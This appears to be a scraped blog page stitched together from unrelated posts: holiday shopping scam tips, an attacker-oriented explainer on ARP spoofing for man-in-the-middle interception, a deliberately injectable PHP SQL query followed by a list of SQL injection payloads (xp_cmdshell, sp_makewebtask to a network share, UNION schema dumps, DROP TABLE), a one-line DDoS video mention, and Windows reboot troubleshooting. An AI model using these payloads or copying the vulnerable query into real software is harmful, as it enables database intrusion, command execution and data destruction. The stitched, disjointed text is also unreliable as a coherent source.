Background

Background

Change your prefer background

  • image1
  • image2
  • image3
  • image4
  • image2
  • image1
  • image4
  • image3

Holiday Shopping season is really an excited time for both shoppers and retailers, but unfortunately it's a good time for cyber criminals and scammers as well.
With Black Friday (28th November 2014) and Cyber Monday (1st December 2014) comiing up, you need to be more careful while shopping. These are the two very busy shopping days where shoppers spend millions online.
Every eye will be on retailers to ensure that consumers' online shopping experiences are straightforward and, most importantly, secure. So, at the major part, retailers need to pay attention to extra security measures in order to prevent themselves from massive data breaches, like Target data breach that occurred last year during the Black Friday sales in which over 40 million Credit & Debit cards were stolen.
Not just Target alone, multiple retailers including Neiman Marcus, Michaels Store were also targeted during last Christmas holiday, involving the heist of possibly 110 million Credit-Debit cards, and personal information.
So, in an effort to secure yourself from scammers you need to be aware of some top scams and tips to keep yourself safe online.


1. COPYCAT & FAKE WEBSITES
In order to fraud an online account holder's financial information, scammers could pose their website as a legitimate one. Like you got an email from Amazan.com for the hottest deals, and not Amazon, make sure before providing your financial details.
Check properly thrice who emails are from and if it's an unknown, best way is to avoid the email and the so-called hottest deal. Always go for a website using an HTTPS URL, before entering a password or any information like address or credit card number.
There are thousands of websites that closely resemble legitimate domains like Amazon, Google, Apple, Facebook and Microsoft. Apart from these, there are so many new sites offering online shopping, that it's quite difficult for customers to say which one is legitimate and which is not.
Many of these websites host exciting contests or advertisements for dodgy services to gain your attention and force your finger to click it, while others host malware that can infect your system when you browse to these websites.
So, to be in safer side, always shop from websites which you or your friends know. Just keep one thing in mind while shopping online that Website ratings and security seals can be faked and the website could look too good to be true, but probably it's not.
2. PHISHING WEBSITES
Phishing scams are typically fraudulent email messages, masquerading as a well known and trustworthy entity in an attempt to gather personal and financial information from victims. However, phishing attacks have become more sophisticated recently.
Keep an eye on scams emails claiming to come from legitimate sources which will ask you to visit a website actually hosted by cyber crooks in order to steal your personal information like email addresses, passwords, credit card numbers, expiration date, verification code, and more.
Always type website name in Google Search Engine and then visit the particular website from those search results, instead visiting through any link provided in messages or emails. Don't go to websites you've never heard of.
3. UNEXPECTED GIFTS SCAM
A year ago during Black Friday, one of the major scams was the cyber criminals offering $1,000 Best Buy gift cards, which nobody won. But, a lot of people ended up in giving away their personal information for no reason at all.
Online users are recommended to avoid such "unexpected gifts" scams, just like your dear ones recommend you to not accept unexpected gifts from strangers. Emails could be a major medium to offer you unwanted gifts, so be careful when opening attachments you receive by email - that special delivery could end up costing you.
4. FAKE ADS AND COUPONS
Customers on holiday season are always on search for great deals, especially on Black Friday and Cyber Monday, but your just a small mistake can lead you to danger. Miscreants use your desires by creating 'click-bait' ads or posting links to 'the best deal ever', which will always lead to either a survey, a scam site or even drive-by exploits.
Customers are advised to treat such offers with skepticism, especially when the source is unknown and unfamiliar to you. You are also advised to keep an updated Antivirus software onto their systems, so if any convincing advert does trick you and gain your click, your AV protects you against infection.
In addition to fake ads for Best Buy, users also want to look out for fake online coupons in general. If it sounds too good to be true, visit directly to reputable websites, and, by some miracle, the offer is true because it's Black Friday sales, it's all yours.


Man-In-The-Middle attack using ARP spoofing


ARP stands for Address Resolution Protocol. ARP acts as a layer over the Internet Protocol address (IP) and converts it into a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA). Understanding the concept of ARP is very important for a hacker because, a potential hacker will be able to poison the network and steal the information running between two servers. Hence he can execute a ‘Man-In-The-Middle‘ attack using a simple ARP poisoning tool such as Cain & Abel. The function of Cain & Abel is similar to a packet sniffer.
MAC address is a unique identification address for network nodes, such as computers, printers, and other devices on a LAN.  MAC addresses are associated to network adapter that connects devices to networks.  The MAC address is critical to locating networked hardware devices because it ensures that data packets go to the correct place.  ARP tables, or cache, are used to correlate network device’s IP addresses to their MAC addresses.
How it works?
Consider you want the phone number of a person whose name is already known to you. In that case you will checkout your telephone book and if the number is not available the you will call the phone service and request him the number. Here the telephone directory act as ARP tables and the phone service as ARP. ARP tables give the list of addresses of computers which are connected to that system inside the network.
What is ARP poisoning?
If a system(say System 1) requests to connect to another system(System 2) inside the network, then System 2 checks the entry of the System 1 in its ARP tables and if the entry is not present then it is automatically added in System 2′s ARP tables. The weakness of the ARP is that, it cannot identify if a person request to connect with it showing a another address. Therefore a hacker can easily poison this network, that is, a potential hacker if sends a request to connect to System 2 showing the IP address of System 1 then he can access the network of System 1 associated with System 2! So he will be able to obtain the information passing between them. That is, there is another path executed between the System 1 and System 2.
Suppose, if a hacker has poisoned a path between social networking site and a victim’s system then he would be able to steal the information passing between them, like username and password etc.
So here, in this case the phone service is calling you and giving you the number, even though you haven’t requested it! (Scenario mentioned above)
The concept of ARP with a simple example:
The attacker: 10.0.0.1
MAC address: 00-AA-BB-CC-DD-00
The victims: 10.0.0.2
MAC address: 00-AA-BB-CC-DD-E1
Fake address:10.0.0.3
MAC address: 00-AA-BB-CC-DD-E2
A potential hacker sends a packet (request to connect) to 10.0.0.2 with spoofed IP of  10.0.0.3 and then it sends a crafted package to 10.0.0.3 with  spoofed IP of 10.0.0.2 with his own IP. This means that both victims think they can find each other at the MAC address of the attacker. This is known as Man-In-The-Middle attack
Now all the traffic between those 2 hosts will go through the attacker first. So this means that the attack will need to reroute the packets to the real destination else you get a DOS on the network and there will be no traffic possible. Also remember that the ARP tables get updated so if during a long period of time there is no ARP poisoning the entries will be deleted and you won’t be able to sniff until you start poisoning again.

Just run the simplest unprotected query:
$query = "SELECT * FROM users WHERE username = ".stripslashes($_POST['username'])." AND password = ".stripslashes($_POST['password'])
and enjoy! The stripslashes() part is there in case you haven't magic_quotes already disabled (as it should be), to avoid some automatic escaping; otherwise you'll have purest injectable input, just pick up any sql injection you might find on the internet and see. Some example:
' or 1=1--
' or 1--
' or 1
\" or '1'
' or 1=1--
' OR ''='
' or 'a'='a
') or ('a'='a
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; EXEC master..sp_makewebtask \"\\10.10.1.3\share\output.html\", \"SELECT * FROM INFORMATION_SCHEMA.TABLES\"",
10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1;DROP TABLE `users`


This video show how to make a DDOS attack. 


Attention: Do this at your own risk.


Software issue or error

With the introduction of Windows XP Microsoft designed Windows to automatically reboot each time an error occurs such as a BSoD. Although this may be nice for errors that do not occur often, users who have a re-occurring error may wish to identify the error to troubleshoot it. Below are the steps on how this feature can be disabled and enabled in Windows XP, Vista, 7, and 8.
  1. From the Desktop right-click on My Computer.
  2. Click the Properties option.
  3. In the System Properties window click the Advanced tab or the Advanced system settings link.
  4. In Advanced click the Settings button under Startup and Recovery.
  5. In the Startup and Recovery window uncheck the Automatically restart check box.
  6. Click Ok.
Now if the computer generates an error it should not automatically restart and should display an error message, most likely a BSoD.

Hardware issue or error

Caution: Some of the below steps require you open your computer. While in the computer, be cautious of ESD.
Any failing hardware component in your computer could cause your computer to unexpectedly generate an error or reboot without warning. If you have recently attempted to add a new hardware device, remove that device to make sure it is not causing your issues.
Make sure you are not encountering any hardware conflicts by viewing Device Manager for errors.
New drivers can also cause this issue, if you have recently performed any hardware driver updates you may wish to try an earlier version of the drivers. Additional information and help with computer drivers can be found on our drivers page.
If you have updated drivers and removed any hardware that could be causing this issue and continue to experience random reboots, it's possible that the memory is bad in the computer.
Finally, hardware devices that are not installed properly in the computer can also cause random reboots. Make sure all the cables and expansion cards are connected properly to the computer. The best way to determine this is to disconnect and reconnect all cables and expansion cards.

Computer virus

Computer viruses such as the blaster virus are written to reboot your computer without warning. Usually these viruses will make the computer reboot ever 5, 10, 15 or 30 minutes after the computer has booted.
If you believe your computer may be infected with a virus or are uncertain if your computer is infected with a virus make sure your virus scanner definitions are up to date.

Heat related issue

Many computer today are designed to turn off or automatically reboot if the computer, processor, or other device in your computer gets to hot. If you have heard any abnormal noises coming from your computer recently such as a high squealing this could indicate a fan may be failing in your computer.
First, verify the fan on the power supply is working by examining the back of the computer and seeing if the fan is moving and moving smoothly. For all other fans in the computer you will need to either open the computer and verify all fans are working, e.g. processor fan and case fan.
Tip: If your BIOS monitors the RPM of the fans enter CMOS Setup and verify it does not report any errors.

Issue with operating system

If after following each of the above recommendations your computer still continues to reboot it is likely that you are experiencing a Microsoft Windows operating system related issue that cannot be explained. To help make sure this is the case try the below steps.
  1. Reboot the computer and enter CMOS setup as the computer is booting.
  2. After you have loaded the computer in CMOS setup let the computer sit.
If the computer does not reboot while letting the computer sit in CMOS it is likely that you are in fact experiencing an issue with Microsoft Windows and it is recommend that if you have followed all of the above recommendations that you reinstall Microsoft Windows.